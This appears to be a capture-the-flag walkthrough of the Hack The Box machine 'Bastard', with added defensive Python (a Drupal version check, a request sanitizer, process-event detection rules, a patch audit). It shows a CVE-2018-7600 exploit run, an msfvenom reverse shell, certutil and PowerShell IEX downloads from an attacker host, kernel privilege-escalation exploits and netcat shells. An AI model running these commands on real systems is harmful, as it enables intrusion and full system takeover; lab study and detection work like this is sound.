Walkthrough
Gaining a Foothold
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -Pn 10.129.47.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 08:47 EST
Nmap scan report for 10.129.47.150
Host is up (0.35s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 26.91 seconds
┌──(kali㉿kali)-[~/WPE/Bastard]
└─$ nmap -T4 -p- -A -Pn 10.129.47.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 08:45 EST
Nmap scan report for 10.129.47.150
Host is up (0.39s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2693.30 seconds
HTTP
First look at the version information
/robots.txt
Drupal 7.54
/CHANGELOG.txt
/INSTALL.sqlite.txt
/INSTALL.pgsql.txt
/install.php
/INSTALL.txt
Drupal
Admin user exists
There seems to be only the admin user: /user/2 returns "Page not found".
PHP module exists
/node/1
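The version came straight from the exposed CHANGELOG.txt that robots.txt "disallows" (a robots Disallow is a hint to crawlers, not an access control). As an added example that is not part of the original walkthrough, the following Python check parses a saved copy of a Drupal CHANGELOG.txt and flags a 7.x version below 7.58, the release that carries the SA-CORE-2018-002 (CVE-2018-7600) fix. The changelog text below is a constructed sample in the real file's layout, not the actual Drupal changelog.

```python
"""Flag an exposed Drupal CHANGELOG.txt whose newest 7.x release predates the
CVE-2018-7600 fix. Added example, not from the original walkthrough; runs
offline on text so it can be pointed at a saved copy of the file."""
import re

# Drupal 7.58 is the first 7.x release containing the SA-CORE-2018-002 fix
# (the exploit banner on this page says "DRUPAL 7 <= 7.57").
FIXED_VERSION = (7, 58)

# Constructed sample mirroring the layout of a Drupal 7.54 CHANGELOG.txt.
SAMPLE_CHANGELOG = """\
Drupal 7.54, 2017-02-01
-----------------------
- Constructed placeholder entry for the sample.
- Another constructed placeholder entry.

Drupal 7.53, 2016-12-07
-----------------------
- Constructed placeholder entry for the older release.
"""

# Newest release is listed first: "Drupal <major>.<minor>[.<patch>], <date>"
VERSION_RE = re.compile(r"^Drupal (\d+)\.(\d+)(?:\.\d+)?, \d{4}-\d{2}-\d{2}", re.M)


def parse_drupal_version(changelog_text):
    """Return (major, minor) of the newest release listed, or None."""
    m = VERSION_RE.search(changelog_text)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def is_below_fix(version, fixed=FIXED_VERSION):
    """True when version is a 7.x release older than the fixed one.
    Other major branches (8.x has its own fix releases) are not judged here."""
    return version is not None and version[0] == fixed[0] and version < fixed


def assess(changelog_text):
    """One-line finding suitable for a report."""
    v = parse_drupal_version(changelog_text)
    if v is None:
        return "version not found in CHANGELOG.txt"
    if is_below_fix(v):
        return f"Drupal {v[0]}.{v[1]}: below 7.58, affected by SA-CORE-2018-002"
    return f"Drupal {v[0]}.{v[1]}: at or above 7.58"


if __name__ == "__main__":
    print(assess(SAMPLE_CHANGELOG))
```

The same check works on a copy fetched from a site you own; the durable fix is to update Drupal and to block or remove CHANGELOG.txt, the INSTALL*.txt files and install.php from the web root rather than relying on robots.txt.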
┌──(kali㉿kali)-[/opt/CVE-2018-7600]
└─$ python3 drupa7-CVE-2018-7600.py http://10.129.47.150/ -c "whoami"
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-Fk3-z5KxIScxY3NI9kCyRQMoha-HG4QlQ7BItJhS8aY
[*] Triggering exploit to execute: whoami
nt authority\iusr
┌──(kali㉿kali)-[/opt/CVE-2018-7600]
└─$ python3 drupa7-CVE-2018-7600.py http://10.129.47.150/ -c 'systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"'
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-MdDA9Xm1kEAINJrBYFnXxMip_gRl2iUGoK6bFndlygw
[*] Triggering exploit to execute: systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
System Type: x64-based PC
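CVE-2018-7600 works because Drupal 7's Form API treated user-supplied request keys beginning with "#" (render-array control keys) as trusted. The 7.58 fix added a request sanitizer that strips such keys before the framework sees them. As an added example in Python (not Drupal's own PHP code), the function below reproduces that hardening rule: recursively drop any "#"-prefixed key from nested request parameters unless it is on an explicit allow list, and return what was removed so it can be logged. The request body is constructed with placeholder values, not a working payload.

```python
"""Strip render-array control keys ('#...') from request parameters, modelled
on the request sanitizer Drupal 7.58 added for CVE-2018-7600. Added example,
not Drupal's code; the input below is a constructed sample."""


def strip_hash_keys(params, whitelist=frozenset(), _removed=None):
    """Recursively remove dict keys that start with '#' (unless whitelisted).

    Returns (sanitized_copy, removed_keys). The input is not modified, so the
    caller can log the removed keys and then replace the original request data."""
    if _removed is None:
        _removed = []
    if isinstance(params, dict):
        clean = {}
        for key, value in params.items():
            if isinstance(key, str) and key.startswith("#") and key not in whitelist:
                _removed.append(key)
                continue
            clean[key], _ = strip_hash_keys(value, whitelist, _removed)
        return clean, _removed
    if isinstance(params, list):
        return [strip_hash_keys(v, whitelist, _removed)[0] for v in params], _removed
    return params, _removed


def sanitize_request(params, whitelist=frozenset()):
    """Sanitize and produce the log message a sanitizer would emit (constructed wording)."""
    clean, removed = strip_hash_keys(params, whitelist)
    message = None
    if removed:
        message = "Potentially unsafe keys removed from request parameters: " + ", ".join(removed)
    return clean, message


# Constructed POST body: ordinary form fields plus nested '#' keys of the kind the
# exploit relies on. Values are placeholders.
CONSTRUCTED_POST = {
    "form_id": "user_register_form",
    "name": "alice",
    "mail": {"#type": "markup", "#markup": "constructed"},
    "pass": ["hunter2", {"#access": True}],
}

if __name__ == "__main__":
    clean, message = sanitize_request(CONSTRUCTED_POST)
    print(clean)
    print(message)
```

The allow list exists because a few legitimate integrations do send "#" keys; leaving it empty is the safe default. Logging the removed keys gives a cheap detection signal: a burst of "#post_render"-style keys arriving at a Drupal 7 site is exactly what an exploitation attempt looks like at the application layer.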
Generate the payload and host it over HTTP
┌──(kali㉿kali)-[~/WPE/Bastard]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.24 LPORT=443 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
┌──(kali㉿kali)-[~/WPE/Bastard]
└─$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Set up listener and reverse shell
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.16.24] from (UNKNOWN) [10.129.47.150] 55171
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr
C:\inetpub\drupal-7.54>systeminfo
systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3582622-84461
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 19/1/2024, 3:43:41 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2394 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2394 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.515 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.522 MB
Virtual Memory: In Use: 573 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.47.150
Windows Exploit Suggester
┌──(kali㉿kali)-[/opt/Windows-Exploit-Suggester-python3-master]
└─$ sudo ./windows-exploit-suggester.py --database 2024-01-19-mssb.xlsx --systeminfo /home/kali/WPE/Bastard/systeminfo.txt
[*] initiating winsploit version 3.4...
[*] database file detected as xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
Escalating Privilege
https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/screenshot.png
Transfer and execute MS10-059.exe
┌──(kali㉿kali)-[/opt/CVE-2018-7600]
└─$ python3 drupa7-CVE-2018-7600.py http://10.129.47.150/ -c 'certutil -urlcache -f http://10.10.16.24/Chimichurri.exe c:\temp\c.exe'
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-B-hjq69ScaYAMrBRMv-09EvtC2LTu7nvo2SK7BNascs
[*] Triggering exploit to execute: certutil -urlcache -f http://10.10.16.24/Chimichurri.exe c:\temp\c.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
┌──(kali㉿kali)-[/opt/CVE-2018-7600]
└─$ python3 drupa7-CVE-2018-7600.py http://10.129.47.150/ -c 'c:\temp\c.exe 10.10.16.24 7777'
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-4OoJgxQaHDL-dLMN5IZbsL-NX4J_xoB7Kg8shvTPqhE
[*] Triggering exploit to execute: c:\temp\c.exe 10.10.16.24 7777
Set up listener and reverse shell
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.16.24] from (UNKNOWN) [10.129.47.150] 55183
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system
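Everything up to this point leaves a clear host-side trail: the IIS worker (or its php-cgi child) spawning cmd.exe as NT AUTHORITY\IUSR, certutil -urlcache pulling a file from an http:// URL, and the web account then running a binary out of c:\temp. As an added example (not part of the original walkthrough), the Python below runs three detection rules over constructed process-creation events laid out like Sysmon Event ID 1 / Windows 4688 fields. The field names and the events themselves are assumptions built from the values shown on this page.

```python
"""Detection rules for the host-side traces of a web RCE to reverse-shell chain.
Added example, not from the original walkthrough. Events are constructed in a
Sysmon Event ID 1 / 4688 style; field names are assumptions."""
import re

WEB_WORKERS = {"w3wp.exe", "php-cgi.exe"}      # IIS worker and its PHP CGI child
SHELLS = {"cmd.exe", "powershell.exe"}
WEB_ACCOUNT_RE = re.compile(r"\\iusr$", re.I)   # NT AUTHORITY\IUSR, the IIS anonymous account
# certutil's URL cache option fetching from an http(s) URL: the LOLBin download pattern.
CERTUTIL_DL_RE = re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)
# Directories the web account is expected to run binaries from.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")

# Constructed events reusing the host names, paths and addresses from this page.
CONSTRUCTED_EVENTS = [
    {"user": "NT AUTHORITY\\IUSR", "parent": "php-cgi.exe", "image": "cmd.exe",
     "path": "C:\\Windows\\System32\\cmd.exe", "cmdline": 'cmd.exe /c "whoami"'},
    {"user": "NT AUTHORITY\\IUSR", "parent": "php-cgi.exe", "image": "cmd.exe",
     "path": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": 'cmd.exe /c "certutil -urlcache -f http://10.10.16.24/Chimichurri.exe c:\\temp\\c.exe"'},
    {"user": "NT AUTHORITY\\IUSR", "parent": "cmd.exe", "image": "c.exe",
     "path": "c:\\temp\\c.exe", "cmdline": "c:\\temp\\c.exe 10.10.16.24 7777"},
    {"user": "BASTARD\\Administrator", "parent": "explorer.exe", "image": "cmd.exe",
     "path": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe"},
]


def evaluate(event):
    """Return the names of every rule the event matches (empty list = no alert)."""
    hits = []
    parent = event["parent"].lower()
    image = event["image"].lower()
    path = event["path"].lower()
    # Rule 1: a web-server worker process should never launch a command shell.
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("web_worker_spawned_shell")
    # Rule 2: certutil used as a downloader.
    if CERTUTIL_DL_RE.search(event["cmdline"]):
        hits.append("certutil_download")
    # Rule 3: the anonymous web account executing something outside system dirs.
    if WEB_ACCOUNT_RE.search(event["user"]) and not path.startswith(TRUSTED_DIRS):
        hits.append("web_account_exec_from_untrusted_dir")
    return hits


def scan(events):
    """Return [(event_index, [rule, ...]), ...] for events that triggered a rule."""
    alerts = []
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            alerts.append((i, hits))
    return alerts


if __name__ == "__main__":
    for index, rules in scan(CONSTRUCTED_EVENTS):
        print(index, CONSTRUCTED_EVENTS[index]["cmdline"], rules)
```

Rule 1 is the highest-value one: it fires on the very first `whoami` and does not depend on which exploit was used. Rules 2 and 3 catch the tool transfer and execution stages even when the shell was obtained some other way; in production they would be fed by process-creation events with command-line logging enabled.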
MS16-014
Download Sherlock.ps1
Add Find-AllVulns at the very bottom of the script
https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1
https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.24/Sherlock.ps1') | powershell -noprofile -
c:\temp>echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.24/Sherlock.ps1') | powershell -noprofile -
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.24/Sherlock.ps1') | powershell -noprofile -
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Not Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Not Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
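Windows Exploit Suggester and Sherlock answer the same question two ways: the first compares the installed KB list from systeminfo against a bulletin database (with "Hotfix(s): N/A" everything is "remaining"), the second compares file versions of specific system binaries against the patched version, which is where "Appears Vulnerable" comes from. As an added example that is neither tool's code, the Python below does both on constructed input: it parses a systeminfo dump, reports which bulletins' KBs are absent, and compares a driver version against a patched threshold. The bulletin-to-KB pairs come from Microsoft's bulletin pages (MS10-059's 982799 is also in the Exploit Suggester output above) but the table is illustrative, and the version threshold is constructed, not Sherlock's actual value.

```python
"""Offline patch-level audit in the spirit of Windows Exploit Suggester and
Sherlock. Added example, not either tool's code. Sample systeminfo text,
the bulletin table and the version threshold are constructed/illustrative."""
import re

# Constructed systeminfo excerpt: unpatched host, "Hotfix(s): N/A" as on this page.
SAMPLE_SYSTEMINFO = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

# Constructed excerpt of a partly patched host.
SAMPLE_PATCHED = """\
Host Name:                 EXAMPLE
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2984972
                           [02]: KB3057191
                           [03]: KB3124280
"""

# Bulletin -> KB article, as published by Microsoft; illustrative, far from complete.
BULLETINS = {
    "MS10-059": "KB982799",
    "MS14-058": "KB3000061",
    "MS15-051": "KB3057191",
    "MS16-032": "KB3143141",
}


def parse_systeminfo(text):
    """Pull the OS version string and the set of installed KB numbers."""
    m = re.search(r"^OS Version:\s*(\d+\.\d+\.\d+)", text, re.M)
    hotfixes = set(re.findall(r"\[\d+\]:\s*(KB\d+)", text))
    return {"os_version": m.group(1) if m else None, "hotfixes": hotfixes}


def missing_bulletins(hotfixes, bulletins=BULLETINS):
    """Bulletins whose KB is not in the installed list (sorted for stable reports)."""
    return sorted(b for b, kb in bulletins.items() if kb not in hotfixes)


def version_tuple(s):
    """'6.1.7600.16385' -> (6, 1, 7600, 16385) so versions compare numerically."""
    return tuple(int(part) for part in s.split("."))


def file_version_vulnerable(current, patched):
    """Sherlock-style check: the binary is older than the version that shipped the fix."""
    return version_tuple(current) < version_tuple(patched)


def audit(systeminfo_text, bulletins=BULLETINS):
    info = parse_systeminfo(systeminfo_text)
    return {
        "os_version": info["os_version"],
        "installed_kbs": sorted(info["hotfixes"]),
        "missing": missing_bulletins(info["hotfixes"], bulletins),
    }


if __name__ == "__main__":
    print(audit(SAMPLE_SYSTEMINFO))
    print(audit(SAMPLE_PATCHED))
    # Constructed threshold: compare a RTM-era win32k.sys version against a later one.
    print(file_version_vulnerable("6.1.7600.16385", "6.1.7601.18798"))
```

The KB comparison is only a first pass: later cumulative updates supersede earlier KBs without listing them, so an absent KB is not proof of exposure. That is why Sherlock checks the file version on disk, and why a patch audit should do both and then confirm with the vendor's supersedence data.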
MS15-051
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
c:\temp>certutil -urlcache -f http://10.10.16.24/ms15-051x64.exe ms15-051.exe
certutil -urlcache -f http://10.10.16.24/ms15-051x64.exe ms15-051.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\temp>whoami
whoami
nt authority\iusr
c:\temp>ms15-051.exe
ms15-051.exe
[#] ms15-051 fixed by zcgonvh
[#] usage: ms15-051 command
[#] eg: ms15-051 "whoami /all"
c:\temp>whoami
whoami
nt authority\iusr
c:\temp>ms15-051.exe whoami
ms15-051.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1044 created.
==============================
nt authority\system
c:\temp>certutil -urlcache -f http://10.10.16.24/nc1.exe nc1.exe
certutil -urlcache -f http://10.10.16.24/nc1.exe nc1.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\temp>certutil -urlcache -f http://10.10.16.24/nc64.exe nc64.exe
certutil -urlcache -f http://10.10.16.24/nc64.exe nc64.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\temp>certutil -urlcache -f http://10.10.16.24/nc.exe nc.exe
certutil -urlcache -f http://10.10.16.24/nc.exe nc.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\temp>certutil -urlcache -f http://10.10.16.24/ms15-051x64.exe ms15-051.exe
certutil -urlcache -f http://10.10.16.24/ms15-051x64.exe ms15-051.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\temp>whoami
whoami
nt authority\iusr
The nc.exe build that works: https://github.com/int0x33/nc.exe/blob/master/nc.exe
Set up listener on 7777
┌──(kali㉿kali)-[/opt]
└─$ nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.16.24] from (UNKNOWN) [10.129.29.65] 49197
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\temp>whoami
whoami
nt authority\system